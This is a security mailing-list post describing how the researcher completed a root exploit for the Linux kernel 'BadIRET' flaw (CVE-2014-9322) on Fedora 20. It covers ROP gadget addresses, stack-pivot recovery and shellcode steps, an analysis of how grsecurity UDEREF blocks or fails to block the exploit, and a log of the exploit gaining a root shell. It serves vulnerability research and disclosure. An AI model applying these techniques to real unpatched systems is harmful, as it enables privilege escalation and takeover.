Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sat, 4 Jul 2015 09:23:48 +0200
From: Adam Zabrocki <>
Subject: Follow-up on Exploiting "BadIRET" vulnerability (CVE-2014-9322)


The journey into CVE-2014-9322 is not straightforward but it is worth to spend some time on it and analyze all available information. I will try my best...

1) Introduction - non-technical (almost)

Everything starts from the CVE-2014-9090. This vulnerability was discovered by Andy Lutomirski which allows you (quoting MITRE):

"The do_double_fault function in arch/x86/kernel/traps.c in the Linux kernel through 3.17.4 does not properly handle faults associated with the Stack Segment (SS) segment register, which allows local users to cause a denial of service (panic) (...)"

which essentially may results in local DoS attack. It doesn't sounds so critical from the defender's point of view (but still it takes attention especially from the nature of vulnerability point of view) neither from the attackers perspective. Mainly because of the potential limited benefits after successful exploitation.

The "fun" starts after Borislav Petkov asked some questions about CVE-2014-9090. Andy Lutomirski discovered another vulnerability in the same functionality which was masked by first one. (Un)fortunately this time it was very serious (I would say critical) flaw. Linux kernel does not properly handle faults associated with the Stack Segment (SS) register in the x86 architecture. Quoiting MITRE again:

"(...) allows local users to gain privileges by triggering an IRET instruction that leads to access to a GS Base address from the wrong space."

Does the nature of vulnerability sound familiar?
What about Rafal 'n3rgal' Wojtczuk research which ends up receiving CVE-2012-0217? (which was directly connected with CVE-2006-0744).
Yes... in principals both vulnerabilities gave us same thing - we can force kernel to be executed under user-controlled GS base address (via %gs register).

For some reasons CVE-2014-9322 didn't take much attention (again similarities to CVE-2006-0744) until Rafal 'n3rgal' Wojtczuk didn't point it out on 2nd of February 2015 via publish amazing research on Bromium Labs blog:

about how the nature of vulnerability works, how it can be used to achieve code-exec (which is not trivial - great research!) and using single NULL-byte write primitive turn into fully weaponized exploit which bypasses SMEP mitigation (not SMAP). Highly recommended to review it in details.

After this publication vulnerability started to get more and more attention (especially from the grsecurity twitter account :)). Until now (almost half a year) there is not known public real exploit which will fully implement Rafal's idea to achieve code-execution. There is only Proof-Of-Concept available which results in DoS attack (so the same as results of CVE-2014-9090 - not very useful):

which ends up being here:

2) More technical part (based on Fedora 20 -> kernel: 3.11.10-301.fc20.x86_64)

I decided to take a challenge and fully implement Rafal's idea and end-up being successed solving some interesting problems during the work. I will start where Rafal finished his write-up, which means we end up successfully stack pivoting and executing ROP gadgets (in his case disabling SMEP in CR4 register and executing 'real' shellcode/kernelcode in userland page).

*) Stack pivoting and ROP are being executed in the context of follow_link() function which is inlined in path_openat(). The context flow can be summarized as follow:

SyS_open -> SYSC_open -> do_sys_open -> do_filp_open -> path_openat -> follow_link()

Inlined function do relative call which in the end redirect transfer to our code:

   0xffffffff811b84ab <+955>:   jmpq   0xffffffff811b81b3 <path_openat+195>
   0xffffffff811b84b0 <+960>:   movl   $0x4,0x40(%r12)
   0xffffffff811b84b9 <+969>:   mov    0x30(%r15),%rax
   0xffffffff811b84bd <+973>:   mov    %r15,%rdi
   0xffffffff811b84c0 <+976>:   mov    %r12,%rsi
   0xffffffff811b84c3 <+979>:   mov    0x20(%rax),%rax
   0xffffffff811b84c7 <+983>:   callq  *0x8(%rax)
   0xffffffff811b84ca <+986>:   cmp    $0xfffffffffffff000,%rax
   0xffffffff811b84d0 <+992>:   mov    %rax,%r15
   0xffffffff811b84d3 <+995>:   jbe    0xffffffff811b8532 <path_openat+1090>
   0xffffffff811b84d5 <+997>:   mov    %r12,%rdi
   0xffffffff811b84d8 <+1000>:  mov    %eax,%ebx
   0xffffffff811b84da <+1002>:  callq  0xffffffff811b2930 <path_put>

After our code has being executed first problems start (cleaning part). Every call to function path_put(), do_last(), dput(), mntput() or put_link(), may ends up playing with kernel locks. Because the stack is pivoted this will not going to be 
happy ending. Additionally, path_openat() has inline many functionalities, some registers have special meaning (pointers to the structures/objects) which kernel will try to access at some point at may results in kernel crash and/or panic. At the beginning I was trying to track down all problematic execution and manually fixing it but there is just too many correlation between registers/objects/spinlocks... (btw. Linux kernel 3.xx changed internal representation of raw_spin_lock 
comparing to previous kernels which is (un)fortunately much more problematic when you want manually synchronize it).
There needed to be better solution, and if you think about pivoting itself you may find one. If you instead of manual fixing all necessary problems force kernel to do it you may win that game. If you find a way to "restore" original stack frame 
for the function before stack pivoting was taken kernel should naturally remove all locks and correctly unwind the stack and system will be stable. This can be achieved via let's call it reverse stack pivoting :) Directly after stack pivot, in 
temporary register you should have valid address of the stack which you want to know. In our case situation is a bit more complicate because we are losing 32 most significant bits of the address. ROP gadget looks like:

   0xffffffff8119f1ed <__mem_cgroup_try_charge+1949>:   xchg   %eax,%esp
   0xffffffff8119f1ee <__mem_cgroup_try_charge+1950>:   retq

why this gadget was taken and we lose 32bits (we want to)? Please read Rafal's write-up.
So if we find some ROP gadget which directly after stack pivoting will save 32 least significant bits of original stack pointer in safe place, we could try to restore it and reconstruct original address before we gave control to the kernel. I've 
chosen following ROP-gadget:

   0xffffffff8152d8fe <kernel_listen+14>:       push   %rax
   0xffffffff8152d8ff <kernel_listen+15>:       pop    %rax
   0xffffffff8152d900 <kernel_listen+16>:       pop    %rbp
   0xffffffff8152d901 <kernel_listen+17>:       retq

which essentially push %rax value (in fact high bits are zeroed) and move stack pointer after stored value. At this point we may precisely calculate where it will be stored.

Problem solved (reverse-stack pivot won :P)

*) If your shellcode is going to be executed for too long there is high chance scheduler will preempt you which sometimes may be critical - depends on the current stage of execution and what is going to be preempting you. Quite often you may 
receive APIC timer interrupt connected with updating process times (known as tick'ing) which may screw you up on some corner cases - it should be taken into account!

btw. if you have bad luck you may be preempted as soon as you did stack pivoting ;p

*) Our code is executed while proc_root structure is corrupted... :) This is NOT what we would like to have. It dramatically increases chance of kernel crash if other process will do any operation on /proc pseudo-filesystem. proc_root.subdir value must be restored as soon as it can be to decrease the chance of random crash. There is few possible ways of doing it:

a) instead of overwriting 6 bytes of subdir do only 5 of them which will leave 3 bytes untouched. This means we can easily reconstruct original value by adding 0xffff8800 value at the most significant bits (for that kernel) and trying to find 
only 1 byte which is 256 possibilities. Chance of crash is very low (touching not mapped page). Additionally this requires allocation in user space around 16 MB to have guarantee that after referencing overwritten proc_root.subdir always ends up 
in our controlled memory.

b) we can brute force full address by 'preventing' from Page Fault (#PF). For the short period of time we can overwrite #PF handler with simple code:
- Get the exception from the stack
- Change the address which caused crash to smth which we know is mapped
- Restart faulting instruction

original brute force loop will continue running

c) Ignore all of the problems and just reconstruct address as much as it can be and do brute force rest of the bytes. Apparently it's quite reliable and effective. We know that high significant bytes are 0xffff8800 and we have 2 least 
significant bytes. We need to find 2 bytes which are unknown for us. On Linux (as opposed to Windows) kernel memory are not being paged out (swapped out). Chance of hitting unmapped page is quite low when we brute force just 2 bytes in the 
middle of reconstructed address - believe me or not, it works well :)

Problem is also how we judge if the address is correct or not. It's quite simple, struct proc_dir_etry has 'parent' field. We must find address which will have on the specific offset, address of proc_root (which is known). In the end we check 65536 addresses and chance of FP is low as well. I've never hit that situation.

Summarizing our shellcode must:
- save original stack pointer value
- disable interrupts (to prevent from being preempted) and start to reconstruct corrupted proc_root.subdir value
- do REAL (s)hellcode
- restore original stack pointer
- restore frame pointer
- restore registers pointing to the internal objects
- enable interrupts and return to the normal kernel execution

3) Grsecurity => UDEREF

As I mentioned Rafal's research has been "sighted" by spender via:

Additionally some people suggests UDEREF is as effective as SMAP with blocking exploitation of this vulnerability:

"This is likely to be easy to exploit for privilege escalation, except
on systems with SMAP or UDEREF.  On those systems, assuming that the
mitigation works correctly, the impact of this bug may be limited to
massive memory corruption and an eventual crash or reboot."

This is not completely true. UDEREF may be as effective (in fact even more) as SMAP or only as effective as SMEP (on AMD64) which will not prevent exploitation at all (using described technique). So what's going on? :) Currently UDEREF for AMD64 has 3 different implementations:

- slow / weak legacy implementation
- strong implementation on Sandy Bridge and later
- fast / weak implementation on Sandy Bridge and later

First implementation of UDEREF on AMD64 was "weak" implementation and information about it was described by PaX team here:

I will quote the essential part of it:

"(...) so what does UDEREF do on amd64? on userland->kernel transitions it basically
unmaps the original userland address range and remaps it at a different address
using non-exec/supervisor rights (so direct code execution as used by most
exploits is not possible at least). (...)"

and next:

"(...) UDEREF/amd64 doesn't ensure that the (legitimate) userland accessor
functions cannot actually access kernel memory when only userland is allowed
(some in-kernel users of certain syscalls can temporarily access kernel memory
as userland, and that is enforced on UDEREF/i386 but not on amd64). so if
there's a bug where userland can trick the kernel into accessing a userland
pointer that actually points to kernel space, it'll succeed, unlike on i386.

the other bad thing is the presence of the userland shadow area. this has
two consequences: 1. the userland address space size is smaller under UDEREF
(42 vs. 47 bits, with corresponding reduction of ASLR of course), 2. this
shadow area is always mapped so kernel code accidentally accessing its range
may not oops on it and can be exploited (such accesses can usually happen only
if an exploit can make the kernel dereference arbitrary addresses in which
case the presence of this area is the least of your concerns though).(...)"

== weak UDEREF ==
This means it works essentially similar to SMEP. So how to exploit CVE-2014-9322 under this specific implementation of UDEREF? You just need to change the ROP. Instead of disabling SMEP bit in CR4 register and execute code from the user land, 
implement full shellcode as ROP. It is possible and it won't be stop by weak implementation of UDEREF.

== "new" UDEREF ==
Why strong implementation of UDEREF is different and why does it require Sandy Bridge architecture?
Yes, that's the fun part. I haven't seen any official write-up regarding "new" UDEREF. I wasn't even aware about those changed since I was playing with that exploit :)

Strong implementation of UDEREF using Sandy Bridge++ feature called as PCID to make 'tags' in TLB. By doing it UDEREF may completely separate user land from kernel (via creating new PGD tables):

static inline void enter_lazy_tlb(struct mm_struct *mm, struct task_struct *tsk)
++#if defined(CONFIG_X86_64) && defined(CONFIG_PAX_MEMORY_UDEREF)
+     if (!(static_cpu_has(X86_FEATURE_PCID))) {
+             unsigned int i;+                pgd_t *pgd;
++            pax_open_kernel();
+             pgd = get_cpu_pgd(smp_processor_id(), kernel);
+             for (i = USER_PGD_PTRS; i < 2 * USER_PGD_PTRS; ++i)
+                     set_pgd_batched(pgd+i, native_make_pgd(0));
+             pax_close_kernel();
+     }

+#if defined(CONFIG_X86_64) && defined(CONFIG_PAX_MEMORY_UDEREF)
+             if (static_cpu_has(X86_FEATURE_PCID)) {
+                     if (static_cpu_has(X86_FEATURE_INVPCID)) {
+                             u64 descriptor[2];
+                             descriptor[0] = PCID_USER;
+                             asm volatile(__ASM_INVPCID : : "d"(&descriptor), "a"(INVPCID_SINGLE_CONTEXT) : "memory");
+                             if (!static_cpu_has(X86_FEATURE_STRONGUDEREF)) {
+                                     descriptor[0] = PCID_KERNEL;
+                                     asm volatile(__ASM_INVPCID : : "d"(&descriptor), "a"(INVPCID_SINGLE_CONTEXT) : "memory");
+                             }
+                     } else {
+                             write_cr3(__pa(get_cpu_pgd(cpu, user)) | PCID_USER);
+                             if (static_cpu_has(X86_FEATURE_STRONGUDEREF))
+                                     write_cr3(__pa(get_cpu_pgd(cpu, kernel)) | PCID_KERNEL | PCID_NOFLUSH);
+                             else
+                                     write_cr3(__pa(get_cpu_pgd(cpu, kernel)) | PCID_KERNEL);
+             } else

In the end context run in kernel mode will NOT see any usermode pages. This implementation I personally believe is much stronger than SMAP. Why?

1. You can't just disable one bit in CR4 register to fully turn off this mitigation
2. In case of SMAP, you can see userland pages (there is existing Page Tables translating userland addresses. 'P' bit is set) but you just can't touch it. In "new" UDEREF you don't see userland at all (PGD is completely different for kernel context and there is no Page Tables describing userland addresses. 'P' bit is unset).

This version of UDEREF was firstly introduced on grsecurity version 3.0 in February 2014. Good work! Will be nice if PaX/grsecurity may publish some details of their research and great implementation :)

Btw. In both cases result of touching userland addresses is the same - #PF will be generated :)
Btw2. The same "strong" UDEREF functionality may be achieved without hardware PCID feature. The main difference is performance. Without hardware support for PCID it should be a mess from the performance point of view.

== Summarizing ==
This vulnerability can be exploited under UDEREF and can NOT be exploited under "new" UDEREF which is enabled on Sandy Bridge++ architecture.

In fact you can still use this vulnerability to fully DoS machine under "new" UDEREF? How? It's quite funny and tricky, you can force infinitive loop of #PF :) As soon as kernel enters to the do_general_protection() function it will try to read GDT bia GS base by executing following instruction:

    0xffffffff8172910e <do_general_protection+30>:       mov    %gs:0xa880,%rbx

at this situation GS base is pointing to the userland memory. Because there is no PTE entry for that address (kernel context doesn't see userland at all), #PF will be generated. page_fault() function will be executed and following:

page_fault -> do_page_fault -> __do_page_fault -> restore_args

it will try to read GDT again and next #PF will be generated and so on... so on... so on... :) So yes, you can still crash the kernel but there is no way to do anything else because there is no even room for exploitation. Vulnerability has being stopped at principals.

4) Funny facts :)

a) Some versions of libthread requires to create memory with RWX permission when you call pthread_create() function. This is not allowed under PaX/grsec hardening of mmap() and as soon as internal implementation pthread_create() will call 
mmap(), process will be killed :) I met this situation on default installation of Ubuntu LTS where I was testing kernel with grsecurity hardening.

b) on kernel 3.11.10-301.fc20.x86_64 implementation of __switch_to() function using OSXSAVE extension (bit 18 in CR4 register) without checking if CPU has this extension or not:

     0xffffffff81011714 <__switch_to+644>    xsaveopt64 (%rdi)

__switch_to() is executed under disabled interrupts but if OSXSAVE extension is not enabled CPU will generate #UD and it will be deadlock. Before entering to __switch_to() instruction regardless disabling interrupts also there is locked runqueue which will never be unlocked in case of #UD.
I wonder if someone hit this problem in real life :)

c) Fedora 20 exploitation is pretty stable (source code available on my website):

[pi3@...alhost clean_9322]$ cat z_shell.c
#include <stdio.h>

int main(void) {

   char *p_arg[] = { "/bin/sh", NULL };


[pi3@...alhost clean_9322]$ gcc z_shell.c -o z_shell
[pi3@...alhost clean_9322]$ cp z_shell /tmp/pi3
[pi3@...alhost clean_9322]$ ls -al /tmp/pi3
-rwxrwxr-x 1 pi3 pi3 8764 May  6 23:09 /tmp/pi3
[pi3@...alhost clean_9322]$ id
uid=1000(pi3) gid=1000(pi3) groups=1000(pi3)
[pi3@...alhost clean_9322]$ /tmp/pi3
sh-4.2$ id
uid=1000(pi3) gid=1000(pi3) groups=1000(pi3)
sh-4.2$ exit
[pi3@...alhost clean_9322]$ gcc -o procrop procrop.c setss.S
[pi3@...alhost clean_9322]$ gcc -o p_write8 swapgs.c setss.S -lpthread
swapgs.c: In function ‘main’:
swapgs.c:175:29: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
               : "r"(4), "r"((int)p_to_d), "r"(1)
[pi3@...alhost clean_9322]$ ./procrop

        ...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
                           by Rafal 'n3rgal' Wojtczuk
                           && Adam 'pi3' Zabrocki

                Usage: ./procrop <number>


                                1 - kernel [3.11.10-301.fc20.x86_64]

[pi3@...alhost clean_9322]$ ./procrop 1 &
[1] 5827
[pi3@...alhost clean_9322]$
        ...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
                           by Rafal 'n3rgal' Wojtczuk
                           && Adam 'pi3' Zabrocki

        [+] Using kernel target: 3.11.10-301.fc20.x86_64

[pi3@...alhost clean_9322]$
[pi3@...alhost clean_9322]$
[pi3@...alhost clean_9322]$ ps aux |grep procr
pi3       5827 83.0  0.0   4304   320 pts/1    RL   23:12   0:05 ./procrop 1
pi3       5829  0.0  0.1 112660   916 pts/1    S+   23:12   0:00 grep --color=auto procr
[pi3@...alhost clean_9322]$ ./p_write8

        ...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
                           by Rafal 'n3rgal' Wojtczuk
                           && Adam 'pi3' Zabrocki

                Usage: ./p_write8 <number>


                                1 - kernel [3.11.10-301.fc20.x86_64]

[pi3@...alhost clean_9322]$
[pi3@...alhost clean_9322]$ ./p_write8 1

        ...::: -=[ Exploit for CVE-2014-9322 ]=- :::...
                           by Rafal 'n3rgal' Wojtczuk
                           && Adam 'pi3' Zabrocki

        [+] Using kernel target: 3.11.10-301.fc20.x86_64
        [+] mmap() memory in first 2GB of address space... DONE!
        [+] Preparing kernel structures... DONE! (ovbuf at 0x602140)
        [+] Creating LDT for this process... DONE!
        [+] Press enter to start fun-game...
[exploit] pthread 
Done                    ./procrop 1
Segmentation fault (core dumped)
[pi3@...alhost clean_9322]$ ls -al /tmp/pi3
-rwsrwsrwx 1 root root 8764 May  6 23:09 /tmp/pi3
[pi3@...alhost clean_9322]$ id
uid=1000(pi3) gid=1000(pi3) groups=1000(pi3)
[pi3@...alhost clean_9322]$ /tmp/pi3
sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),1000(pi3)
sh-4.2# exit
[pi3@...alhost clean_9322]$


Best regards,
Adam 'pi3' Zabrocki

pi3 (pi3ki31ny) - pi3 (at) itsec pl

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.